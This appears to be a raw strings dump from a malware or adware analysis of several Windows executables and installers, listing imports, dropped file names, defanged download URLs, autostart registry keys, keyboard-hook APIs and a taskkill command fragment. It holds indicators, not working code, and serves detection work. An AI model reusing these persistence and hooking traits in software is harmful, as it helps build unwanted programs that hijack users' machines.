TOOLBAR_RESETKEYBAORD
KeyboardManager
MSG_CHECKEMPTYMINIFRAME
%sDockingManager-%d
&%d %s
JHex={X,X,X}ShowCmd
%sMDIClientArea-%d
f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oleipfrm.cpp
%sBasePane-%d%x
%sBasePane-%d
KExecute
%sPane-%d%x
%sPane-%d
N%sMFCOutlookBar-%d%x
%sMFCOutlookBar-%d
%c%d%c%s
RGB(%d, %d, %d)
%sDockablePaneAdapter-%d%x
%sDockablePaneAdapter-%d
ENABLE_KEYS
KEYS_MENU
KEYS
PRICHED20.DLL
windows
Pf:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\oledrop2.cpp
%sMFCTasksPane-%d%x
%sMFCTasksPane-%d
mscoree.dll
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
%Program Files%\
%Program Files%\jstm
%Program Files%\jstm\juese.exe
{8856F961-340A-11D0-A96B-00C04FD705A2}1.1.0.0
All Files (*.*)
No error message is available.#Attempted an unsupported operation.$A required resource was unavailable.
Command failed.)Insufficient memory to perform operation.PSystem registry entries have been removed and the INI file (if any) was deleted.BNot all of the system registry entries (or INI file) were removed.FThis program requires the file %s, which was not found on this system.tThis program is linked to the missing export %s in the file %s. This machine may have an incompatible version of %s.
Destination disk drive is full.5Unable to read from %1, it is opened by someone else.AUnable to write to %1, it is read-only or opened by someone else.1Encountered an unexpected error while reading %1.1Encountered an unexpected error while writing %1.
#Unable to load mail system support.
Note that if you choose to recover the auto-saved documents, you must explicitly save them to overwrite the original documents. If you choose to not recover the auto-saved versions, they will be deleted.fRecover the auto-saved documents
%s [Recovered]
ignite.exe_2576:
.text
`.data
.rsrc
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
#vb6chs.dll
shdocvw.dll
WebBrowser
%System%\mshtml.tlb
%Program Files%\VB
\VB6.OLB
0%System%\shdocvw.oca
winmm.dll
time.dll
advapi32.dll
RegCloseKey
GetUrlSource
RegCreateKeyA
RegOpenKeyA
wininet.dll
InternetOpenUrlA
VBA6.DLL
%System%\msvbvm60.dll\3
Password
WebBrowser2
WebBrowser1
)o4.tr
sUrl
sSrvCmd
sSrvPassword
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
\time.dll
\weathers.exe
hXXp://mini.yoyolm.net/ta2/?flag=
hXXp://mini.yoyolm.net/ta3/?flag=
hXXp://time.yoyolm.net/newh1/
hXXp://time.yoyolm.net/newh2/
hXXp://time.yoyolm.net/newh3/
hXXp://mini.yoyolm.net/new/
\setings.ini
hXXp://mini.yoyolm.net/ta1/?flag=
(C) hXXp://VVV.tqshopping.com/
manual.exe
ignite.exe_2576_rwx_012F1000_00018000:
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke
mankind.exe_2904:
.text
`.data
.rsrc
GDIPLUS.DLL
gdi32.dll
kernel32.dll
NTDLL.DLL
user32.dll
MSVBVM60.DLL
6.vmmvv
pVVV.6
H.yyywsTSTpxyyywfP
SHDocVwCtl.WebBrowser
.aicAlphaImage
.ucListBox
iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="hXXp://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:81BD8030114B11E38938CDD8DE466017" xmpMM:DocumentID="xmp.did:81BD8031114B11E38938CDD8DE466017"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:81BD802E114B11E38938CDD8DE466017" stRef:documentID="xmp.did:81BD802F114B11E38938CDD8DE466017"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>
2014-03-08
.ucShadow
2014/01/15
#vb6chs.dll
.OsenXPComboBox
.CommandButton
.LbDate
.OsenXPDTPicker
.OsenXPSpin
shdocvw.dll
WebBrowser
%Program Files%\VB
\VB6.OLB
#Web1
0%System%\shdocvw.oca
%System%\mshtml.tlb
URLEncode1
time.dll
wininet.dll
InternetOpenUrlA
comctl32.dll
winmm.dll
%System%\msvbvm60.dll\3
WriteIniKey
GetIniKey
DelIniKey
advapi32.dll
RegCloseKey
RegOpenKeyA
Replace.dll
Password
GetAsyncKeyState
SetWindowsHookExA
UnhookWindowsHookEx
VBA6.DLL
msvbvm60.dll
olepro32.dll
msimg32.dll
shell32.dll
F%System%\stdole2.tlb
GdiplusShutdown
gdiplus.dll
zlib.dll
zlib1.dll
__vbaStopExe
KeyDown
KeyPress
KeyUp
cmdBrowse
cmdClipBoard
comdlg32.dll
AddMsg
DelMsg
\ctl\WinSubHook.tlb
IsSysShadowEnabled
GetProcessHeap
SetMsgHook
SetMsgUnHook
ole32.dll
==?==?==?==?==?
==?==?==?
2003/07/13
strURL
strKey
KeyWord
uMsg
sSrvCmd
sSrvPassword
KeyCode
KeyAscii
Occurs when data is dropped onto the control via an OLE drag/drop operation, and OLEDropMode is set to manual
Occurs when the mouse is moved over the control during an OLE drag/drop operation, if its OLEDropMode property is set to manual
Return whether the OS supports layered windows.
Return whether the OS settings suggest that shadows should be employed. Only truly valid on Windows XP, Windows 2000 will always return True. It is up to the programmer as whether this setting is honored.
Return whether we're running under Windows XP.
Returns a handle (from Microsoft Windows) to an object's window.
Returns the number of items in the list portion of a control.
Occurs when the user presses and releases an ANSI key.
Qh$%C
Rh0%C
PhT%C
Qhd%C
Qh0%C
FTPj
\tclock.ini
tray_yes.png
tray_no.png
\time.dll
Software\Microsoft\Windows\CurrentVersion\run
.exe" /t
hXXp://VVV.weather.com.cn/weather/
.shtml
cmd.exe /c taskkill /im
C:\\Program Files\\Internet Explorer\\IEXPLORE.exe
huangli.xml
\journey.exe
\kindness.exe
\kingdom.exe
\knack.exe
\knead.exe
\knee.exe
1.png
setting.ini
ddd.png
\Replace.dll
\Replace64.dll
\uTray.exe
city.txt
toolbar_hover (3).png
2.png
3.png
button_p_pushed.png
button_p_hover.png
00:00:00
hXXp://VVV.baidu.com/s?wd=天气预报&rsv_bp=0&ch=&tn=baidu&bar=&rsv_spt=3&ie=utf-8&rsv_sug3=5&rsv_sug4=565&rsv_sug1=5&oq=天气&rsv_sug2=0&f=3&rsp=0&inputT=9
hXXp://VVV.baidu.com/s?wd=
\Weather_none.png
18:00:00
08:00:00
Refresh_pushed.png
Refresh_normal.png
Refresh_hover.png
<Keys>
</Keys>
<Key ID="
{1D5BE4B5-FA4A-452D-9CDD-5DB35105E7EB}.cb_Callback
*gif;*.bmp;*.jpg;*.jpeg;*.ico;*.cur;*.wmf;*.emf;*.png
*.bmp
*.gif
*.ico;*.cur
*.jpg;*.jpeg
*.wmf;*.emf
*.png
Windows Meta File
Provider=Microsoft.Jet.OLEDB.4.0;Data Source=
\uCalendar\db2.mdb;Persist Security Info=False
Msxml2.XMLHTTP.3.0
application/x-www-form-urlencoded
\uTray.exe"
0000000
DragFullWindows
0123456789
\uCalendar\input.png
\uCalendar\button_3a.png
\uCalendar\button_3b.png
\uCalendar\tip.png
\uCalendar\NewIcons007.png
\uCalendar\button_state5.png
\uCalendar\setting.ini
(C) hXXp://VVV.tqshopping.com/
weathers.exe
mankind.exe_2904_rwx_01C61000_00018000:
%SQVW
<.tBwIJ;
<.tC<9w:<0r6,0f
WinHttp.WinHttpRequest.5.1
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
kernel32.dll
hXXp://VVV.baidu.com/
msvcrt.dll
NTSHRUI.DLL
COMCTL32.DLL
shell32.dll
\QZaweewertghebh.dat
WScript.Shell
WScript.Shell_ERR
setting.ini
set.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\IEXPLORE.EXE
VBScript.RegExp
RegOpenKeyExA
CreateDialogIndirectParamA
ExitWindowsEx
SetWindowsHookExA
UnhookWindowsHookEx
A.eMk$)B$)B$)B$)B$)B$)B$)B2$!
.text
`.data
.link
.rloc
NTSHRUI.DL
.lnk[she
.baidu.
KeyG
.dN"u
.linke
setup_2949-14598.exe_612:
.text
`.rdata
@.data
.rsrc
@.reloc
operator
GetProcessWindowStation
MusicPlayer.exe
BoxNews.exe
Unins.exe
PlayerUpdate.exe
%Program Files%\MusicPlayer
%s\%s -mini
_%d%d%d
%s\%s
%s\SysConfig.ini
hXXp://VVV.yinyue.fm/
%ProgramFiles%\Internet Explorer\iexplore.exe
%s.lnk
Software\Microsoft\Windows\CurrentVersion\Run
"%s\%s" -mini
\SysConfig.ini
Software\Microsoft\Windows\CurrentVersion\Uninstall
Software\Microsoft\Windows\CurrentVersion\Uninstall\
%s\Data\Setup.ini
_pos%d | len%d and Channel %s ||
%d-%d-%d
\yinyue.fm\
\Release\SetupApp.pdb
MSIMG32.dll
WinExec
KERNEL32.dll
USER32.dll
GDI32.dll
RegCreateKeyExA
RegOpenKeyExA
RegCloseKey
ADVAPI32.dll
SHELL32.dll
ole32.dll
gdiplus.dll
SHLWAPI.dll
PSAPI.DLL
GetCPInfo
zcÁ
%Program Files%\fjwyusp\hzsoft\setup_2949-14598.exe
audio.dll
avcodec-54.dll
avcore.dll
avformat-54.dll
avutil-52.dll
channels.xml
Data/client.ini
Data/dh.ini
Data/setup.ini
Data/version.ini
DuiLib.dll
favorfm.xml{libav.dll
pthreadGC2.dll
R~.wo
Skin/125x125.jpg
L.Xkj
Skin/320x225.png
Skin/astop.png}W
Skin/AutoRunTipFrame.xml
Skin/back.png
Skin/bg2.png}SOh
Skin/bg_2.png}S]H
Skin/bk.png|
Skin/border.png
L9q
Skin/btn-anonymity.png}
[).XF
'q.CAqK
Skin/btn-delete.png
Skin/btn-fav.png}Wy8
Skin/btn-login.png}
Skin/btn-login2.png
[%*,\4>66
%S;&DN
Skin/btn-next.png
Skin/btn-pause.png}X
Skin/btn-play.png
Skin/BtnHidePlayList.png
Skin/BtnRightTop.png
Skin/btn_9k.png}Wy8
Skin/btn_bd.png}Xy8
Skin/btn_close.png}Vy8
Skin/btn_comm.png
Skin/btn_db.png}W
Skin/btn_fh.png}XwT
Skin/btn_kw.png}
Skin/btn_ok.png}W
l[O{#. %xSkin/btn_ok_blue.png
Skin/btn_ok_red.png}
Skin/btn_sc.png
=%uIS
Skin/btn_xm.png}X
Skin/button.png
Skin/channel.png
Skin/close.png
Skin/collection.png
ðxEuJxg
Skin/dash.png}SM
Skin/DefaultUserImage.jpg
%S]wF
Skin/downd.png
Skin/downda.png
Skin/downdahover.png
Skin/DownLoadProgressForeImage.png
Skin/exit.png}U
Skin/fbcaptionbk.png
Skin/feedback.png}V
>/.Yhi
Skin/forgettt.jpg
Skin/FrmConfig.xml
Skin/frmdownmenu.xml
Skin/FrmDropDownMenuFrame.xml
Skin/FrmFeedBack.xmle
Skin/FrmHotKeyTip.xmlu
Skin/frmlogin.xml
Skin/FrmLrc.xml
Skin/FrmLrcChild.xmlU
Skin/FrmMenuFrame.xml
Skin/frmplayer.xml
Skin/frmplaylist.xml
Skin/frmProgressToolTip.xmlUPKN
Skin/FrmSystemMenuFrame.xml
Skin/frmWebBrowser.xml=
Skin/frmWindowLrc.xml5
Skin/headimg.png}
d%U(.6
tG%C*
Skin/history.png
Skin/home.png}VgTS
Skin/hotkeytipbk.png
Skin/icon.png
Skin/input-password.png}U
Skin/input-user.png
Skin/like.png
!\Un%x
Skin/list.png
Skin/lista.png
D-wjÓ
Skin/listahover.png
Skin/list_item.xml
Skin/list_item_bg.png}S
Skin/list_pause.png
Skin/list_play.png
Skin/list_scroll_bar.png}SmH
Skin/list_scroll_bar2.png}S_H
{òCSkin/list_title_bg.png}S
Skin/loading01.png
Skin/loading02.png
Skin/loading03.png
Skin/loading04.png
Skin/LoginBk.png
%S%hu.Y
g).IQ
Skin/LrcBk.png
u-3H}.
Skin/lrclist.png}Xy8
@.xn?
Skin/lyricdelete.png
Skin/lyricdeletea.png
Skin/lyricdeletea2.png
Skin/LyricFrameVoice.png
Skin/lyriclike.png
Skin/lyriclikea.png
Skin/lyriclikea2.png
Skin/lyricmute.png
Skin/lyrictoplay.png
Skin/mainframeshadow.png
Skin/max.png
Skin/menu.png
Skin/MessageBox.xml
Skin/min.png}SOh
Skin/mine.png
Skin/minea.png
Skin/mineahover.png
Skin/mini.png
mE)iVA.nP
Skin/more.png}SOH
Skin/musiclibrary.png
Skin/next.png}ViTSg
Skin/next0520.png
Skin/normalVolume.png}U
%DZRlj
Skin/play0520.png
Skin/play2.png
Skin/playerbg01.png
Skin/playerbg02.png
Skin/playerlist.png}X
Skin/playersidebg.jpg
Skin/playinging.jpg
Skin/playinginga.jpg
".Wlm
Skin/playingnext.png
Skin/playingplaying.jpg
Skin/playingprev.jpg
Skin/playingpreva.jpg
Skin/playingrandom.jpg
Skin/playingrandoma.jpg
Skin/playingvoice.png}V
Skin/PlayProgressForeImage.png
Skin/pop_bkimage.png}U
Skin/power.png}XgTS
,&.,/!./*
Skin/prev.png}ViTS
Skin/prev0520.png
Skin/prevention.png
Skin/progresstooltip.png
Skin/progresstooltipbk.png
Skin/progress_fore.png
Skin/pushedVolume.png
Skin/random.jpg
Skin/random01.jpg
Skin/random01a.jpg
Skin/random01hover.jpg
Skin/random02.jpg
Skin/random02a.jpg
Skin/random02hover.jpg
Skin/random03.jpg
Skin/random03a.jpg
Skin/random03hover.jpg
Skin/random0520.png
Skin/reflash.png
Skin/remembertt.jpg
Skin/scrollbar.png
Skin/search.png
E.Eg/&
Skin/SelectColor_SliderBar_Thumb.png
Skin/SetTipFrame.xml
5).uZ
Skin/slider_bg.png
Skin/sound (2).jpg
Skin/sound.jpg
Skin/sound100.jpg
Skin/steup.png}
Skin/suspensionbig.png
Skin/suspensionbiga.png
Skin/suspensionbigahover.png
Skin/suspensionclose.png
Skin/suspensionclosea.png
Skin/suspensioncloseahover.png
Skin/suspensionfeedback.png
Skin/suspensionfeedbacka.png
Skin/suspensionfeedbackahover.png
Skin/suspensionlogin.png
Skin/suspensionmin.png
Skin/suspensionmina.png
Skin/suspensionminahover.png
Skin/suspensionset.png
Skin/suspensionseta.png
Skin/suspensionsetahover.png
Skin/suspensiontop.png
Skin/suspensiontopa.png
Skin/suspensiontopahover.png
.png}U
Skin/system_menu_btnexit.png
Skin/system_menu_btnfeedback.png}V
Skin/system_menu_btnmin.png
;7%2uf
Skin/system_menu_btnmini.png
Skin/system_menu_btnsteup.png}
Skin/system_menu_btntop.png}W
Skin/sys_check_btn.png
Skin/sys_check_btn_blue.png
Skin/sys_check_btn_red.png
Skin/tab_comm.png
Skin/tooltipbk.png
Skin/update.xml
Skin/voice00528.png
Skin/voice0520.png
Skin/voice0a0528.png
Skin/voice1000528.png
Skin/voiceall0528.png
Skin/WindowLrcbkIamge.png
source.dll
swresample-0.dll
SysConfig.iniU
favorfm.xml
Skin/astop.png
Skin/bg2.png
Skin/bg_2.png
Skin/bk.png
Skin/btn-anonymity.png
Skin/btn-fav.png
Skin/btn-login.png
Skin/btn-pause.png
Skin/btn_9k.png
Skin/btn_bd.png
Skin/btn_close.png
Skin/btn_db.png
Skin/btn_fh.png
Skin/btn_kw.png
Skin/btn_ok.png
Skin/btn_ok_red.png
Skin/btn_xm.png
Skin/dash.png
Skin/exit.png
Skin/feedback.png
Skin/FrmFeedBack.xml
Skin/FrmHotKeyTip.xml
Skin/FrmLrcChild.xml
Skin/frmProgressToolTip.xml
Skin/frmWebBrowser.xml
Skin/frmWindowLrc.xml
Skin/headimg.png
Skin/home.png
Skin/input-password.png
Skin/list_item_bg.png
Skin/list_scroll_bar.png
Skin/list_scroll_bar2.png
Skin/list_title_bg.png
Skin/lrclist.png
Skin/min.png
Skin/more.png
Skin/next.png
Skin/normalVolume.png
Skin/playerlist.png
Skin/playingvoice.png
Skin/pop_bkimage.png
Skin/power.png
Skin/prev.png
Skin/steup.png
Skin/system_menu_btnfeedback.png
Skin/system_menu_btnsteup.png
Skin/system_menu_btntop.png
SysConfig.ini
<requestedExecutionLevel level="requireAdministrator" uiAccess="false"></requestedExecutionLevel>
mscoree.dll
AKERNEL32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
WUSER32.DLL
1.0.0.0
SetupApp.exe
AlmDay.exe_1016:
.text
.rdata
.data
.rsrc
.aspack
.adata
t.VVUh
M SSh
F SSh
t$\sshLzJ
inflate 1.2.3 Copyright 1995-2005 Mark Adler
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
GetAsyncKeyState
GetKeyState
USER32.dll
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegCreateKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
COMCTL32.dll
OLEAUT32.dll
MSVCP60.dll
WS2_32.dll
WININET.dll
SensApi.dll
IMAGEHLP.dll
NETAPI32.dll
MSIMG32.dll
UnregisterHotKey
RegisterHotKey
SetWindowsHookExA
UnhookWindowsHookEx
ole32.dll
GdiplusShutdown
GdipSetImageAttributesColorKeys
gdiplus.dll
AlmDay.exe
Range: bytes=%d-%d
Range: bytes=%d-
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Cookie: %s
Host: %s
POST %s HTTP/1.1
GET %s HTTP/1.1
%s %d
.PAVCException@@
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
<>=\/?!"';
(%d nulls removed)
length %d
to length %d
to %d bytes
from length %d
from byte length %d
FQueryInterface failed! ctrl: %d
Can't find the ctrl: %d
SearchConfig.ini
soft.inf
Software\Microsoft\Windows\CurrentVersion\Run
d-d-d
XXXXXX
menu_bg.png
menuseparator.png
menuright.png
menuselectbar.png
menurmark.png
TipsConfig.ini
2.0.3
cybercafe.conf
data\data.bin
AlmDayQuick.exe
mnconf.conf
%s %d %d %d
User32.DLL
btn%d_count
btn%d_image
btn%d_chage
%d %d %
%d %d
progressShadow
0x%X %d
%d %d %d %d
%X %X
colorkey
isshow
layer_%d
x=%d,y=%d
ui/empty.png
_DeleteElem(): item=%d, elem=%d, type=%d, nType=%d
1.2.3
fiTXtXML:com.adobe.xmp
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
gdi32.dll
advapi32.dll
shell32.dll
comctl32.dll
oleaut32.dll
msvcp60.dll
ws2_32.dll
sensapi.dll
imagehlp.dll
netapi32.dll
msimg32.dll
2, 0, 0, 3
AlmDayQuick.exe_2908:
.text
.rdata
.data
.rsrc
.aspack
.adata
MFC42.DLL
MSVCRT.dll
_acmdln
KERNEL32.dll
USER32.dll
SHELL32.dll
OLEAUT32.dll
GdiplusShutdown
gdiplus.dll
MSVCP60.dll
WS2_32.dll
WININET.dll
SensApi.dll
NETAPI32.dll
IMAGEHLP.dll
MSIMG32.dll
GetWindowsDirectoryA
GDI32.dll
RegOpenKeyExA
RegCloseKey
RegQueryInfoKeyA
ADVAPI32.dll
ShellExecuteA
ole32.dll
soft.inf
config.ini
AdsShowTime
MaterAddSrcUrl
Range: bytes=%d-%d
Range: bytes=%d-
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Referer: %s
Cookie: %s
Host: %s
POST %s HTTP/1.1
GET %s HTTP/1.1
%s %d
.PAVCInternetException@@
0900936iso-ir-581028598iso_8859-81201255iso_8859-8-i1200932cswindows31j
0628597greek81201258windows-1258
1201257windows-12570738598logical
1201256windows-12560651932euc-jp
1201255windows-1255
2701143x-ebcdic-finlandsweden-euro1201254windows-1254
0801251x-cp12511201253windows-12531400949ks_c_5601_19871528599iso_8859-9:1989
0801250x-cp12501201252windows-1252
1201251windows-12511528598iso_8859-8:1988
1201250windows-12502301149x-ebcdic-icelandic-euro
1150220iso-2022-jp1100874windows-874
1901145x-ebcdic-spain-euro1620127iso_646.irv:1991
0551932x-euc1250221_iso-2022-jp1000932csshiftjis
http-equiv
<>=\/?!"';
(%d nulls removed)
length %d
to length %d
to %d bytes
from length %d
from byte length %d
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
icourl
%ProgramFiles%\Internet Explorer\iexplore.exe
ShellUrl
KERNEL32.DLL
\winhlp32.exe
{X-X-X-XX-XXXXXX}User32.DLL
CWebBrowser2
kernel32.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
mfc42.dll
msvcrt.dll
shell32.dll
msvcp60.dll
ws2_32.dll
sensapi.dll
imagehlp.dll
gdi32.dll
advapi32.dll
2, 0, 0, 3
AlmDayQuick.exe
Application Dataypfbyfgmr.exe_2796:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.4.2)
Inno Setup Messages (5.1.11)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
'%s' is not a valid integer value
'%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time
'%s' is not a valid date and time
I/O error %d
Integer overflow
Invalid floating point operation
Invalid pointer operation
Invalid class typecast
Access violation at address %p. %s of address %p
Operation aborted
Exception %s in module %s at %p.
Application Error
Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation
Variant method calls not supported
External exception %x
Application Dataypfbyfgmr.tmp_2860:
.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
%s_%d
windows
PasswordChar
OnKeyDown,
OnKeyPress
OnKeyUpD
ssHorizontal
OnKeyUp
OnKeyUp\nA
uxtheme.dll
comctl32.dll
RegDeleteKeyExA
advapi32.dll
.DEFAULT\Control Panel\International
user32.dll
shlwapi.dll
TPSExec
TPSRuntimeClassImporter
TPSExportedVar
Cannot Import
Interface not supported
Uh.RC
TPSCustomDebugExec
TPSDebugExec
Monochrome
SHORTCUTTOKEY
ArrowKeys
THKInvalidKey
THKInvalidKeys
TCustomHotKey
THotKey
HotKey
InvalidKeys<
vsReport
OnKeyUp4
Control '%s' has no parent window
Parent given is not a parent of '%s'
msctls_hotkey32
OnKeyDown
InvalidKeys
oleacc.dll
Uh.UE
RICHED20.DLL
RICHED32.DLL
TPasswordEdit
TPasswordEditP
PasswordEdit*
Password
c:\directory
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
shell32.dll
File I/O error %d
Messages file "%s" is missing. Please correct the problem or obtain a new copy of the program.
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
WININIT.INI
t.Htb
Software\Microsoft\Windows\CurrentVersion\SharedDLLs
RegCreateKeyEx
RegOpenKeyEx
sfc.dll
cmd.exe" /C "
COMMAND.COM" /C
PendingFileRenameOperations
PendingFileRenameOperations2
Software\Microsoft\Windows\CurrentVersion\Fonts
Software\Microsoft\Windows NT\CurrentVersion\Fonts
IPropertyStore::SetValue(PKEY_AppUserModel_ID)
IPropertyStore::SetValue(PKEY_AppUserModel_ExcludeFromShowInNewInstall)
OLEAUT32.DLL
Log opened. (Time zone: UTC%s%.2u:%.2u)
%s Log %s #%.3u.txt
MsgWaitForMultipleObjects
regsvr32.exe"
Spawning _RegDLL.tmp
_isetup\_RegDLL.tmp
_RegDLL.tmp %u %u
REGDLL failed with exit code 0x%x
REGDLL mutex wait failed (%d, %d)
REGDLL returned unknown result code %d
Cannot register 64-bit DLLs on this version of Windows
HELPER_EXE_AMD64
Cannot utilize 64-bit features on this version of Windows
64-bit helper EXE wasn't extracted
\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x
CreateNamedPipe
SetNamedPipeHandleState
helper %d 0x%x
Helper process PID: %u
Stopping 64-bit helper process. (PID: %u)
Helper process exited with failure code: 0x%x
TransactNamedPipe
TransactNamedPipe/GetOverlappedResult
Helper: Command did not execute
SOFTWARE\Microsoft\.NETFramework
.NET Framework not found
SOFTWARE\Microsoft\.NETFramework\Policy\v4.0
v4.0.30319
SOFTWARE\Microsoft\.NETFramework\Policy\v2.0
v2.0.50727
SOFTWARE\Microsoft\.NETFramework\Policy\v1.1
v1.1.4322
.NET Framework version %s not found
Fusion.dll
Failed to load .NET Framework DLL "%s"
Failed to get address of .NET Framework CreateAssemblyCache function
.NET Framework CreateAssemblyCache function failed
MoveFileEx failed (%d).
Deleting directory: %s
Failed to delete directory (%d). Will retry later.
Failed to delete directory (%d). Will delete on restart (if empty).
Failed to delete directory (%d).
Deleting file: %s
Failed to delete the file; it may be in use (%d).
ExtractRecData: Unicode data unsupported by this build
The file appears to be in use (%d). Will delete on restart.
Decrementing shared count (%d-bit): %s
Unregistering 64-bit DLL/OCX: %s
Unregistering 32-bit DLL/OCX: %s
Not unregistering DLL/OCX again: %s
Unregistering 64-bit type library: %s
Unregistering 32-bit type library: %s
Uninstalling from GAC: %s
Running Exec filename:
Running Exec parameters:
CreateProcess failed (%d).
Process exit code: %u
Running ShellExec filename:
Running ShellExec parameters:
ShellExecuteEx failed (%d).
Skipping RunOnceId "%s" filename: %s
Unregistering font: %s
zlib: Internal error. Code %d
1.2.1
bzlib: Internal error. Code %d
lzmadecomp: %s
lzmadecomp: Compressed data is corrupted (%d)
DecodeToBuf failed (%d)
%s-%d.bin
%s-%d%s.bin
..\DISK%d\
Asking user for new disk containing "%s".
Cannot read an encrypted file before the key has been set
LoggedMsgBox returned an unexpected value. Assuming Abort.
Software\Microsoft\Windows\CurrentVersion\Uninstall\
5.4.2.ee2 (a)
URLInfoAbout
URLUpdateInfo
Creating directory: %s
Setting permissions on directory: %s
Failed to set permissions on directory (%d).
Setting NTFS compression on directory: %s
Unsetting NTFS compression on directory: %s
Failed to set NTFS compression state (%d).
IMsg
Failed to set value in Fonts registry key.
Failed to open Fonts registry key.
Setting permissions on file: %s
Failed to set permissions on file (%d).
Setting NTFS compression on file: %s
Unsetting NTFS compression on file: %s
Uh.NG
Dest filename: %s
Dest file is protected by Windows File Protection.
Time stamp of our file: %s
Time stamp of existing file: %s
Version of our file: %u.%u.%u.%u
Version of existing file: %u.%u.%u.%u
Existing file is protected by Windows File Protection. Skipping.
GetPassword
Uninstaller requires administrator: %s
The existing file appears to be in use (%d). Will replace on restart.
The existing file appears to be in use (%d). Retrying.
Registering file as a font ("%s")
Cannot install files to 64-bit locations on this version of Windows
desktop.ini
.ShellClassInfo
{0AFACED1-E828-11D1-9187-B532F1E9575D}target.lnk
Filename: %s
Desktop.ini
Software\Microsoft\Windows\CurrentVersion\App Paths\
Setting permissions on registry key: %s\%s
Could not set permissions on the registry key because it currently does not exist.
Failed to set permissions on registry key (%d).
Cannot access 64-bit registry keys on this version of Windows
Registration executable created: %s
Software\Microsoft\Windows\CurrentVersion\RunOnce
Registering 64-bit DLL/OCX: %s
Registering 32-bit DLL/OCX: %s
Registering 64-bit type library: %s
Registering 32-bit type library: %s
Directory for uninstall files: %s
Will append to existing uninstall log: %s
Will overwrite existing uninstall log: %s
Creating new uninstall log: %s
LoggedMsgBox returned an unexpected value. Assuming Cancel.
Fatal exception during installation process (%s):
ExtractTemporaryFile: The file "%s" was not found
ExtractTemporaryFileEx: The file "%s" was not found
ExtractTemporaryFileToStream: The file "%s" was not found
ExtractTemporaryFileSize: The file "%s" was not found
ExtractTemporaryFileToBuffer: The file "%s" was not found
Invalid symbol '%s' found
Invalid token '%s' found
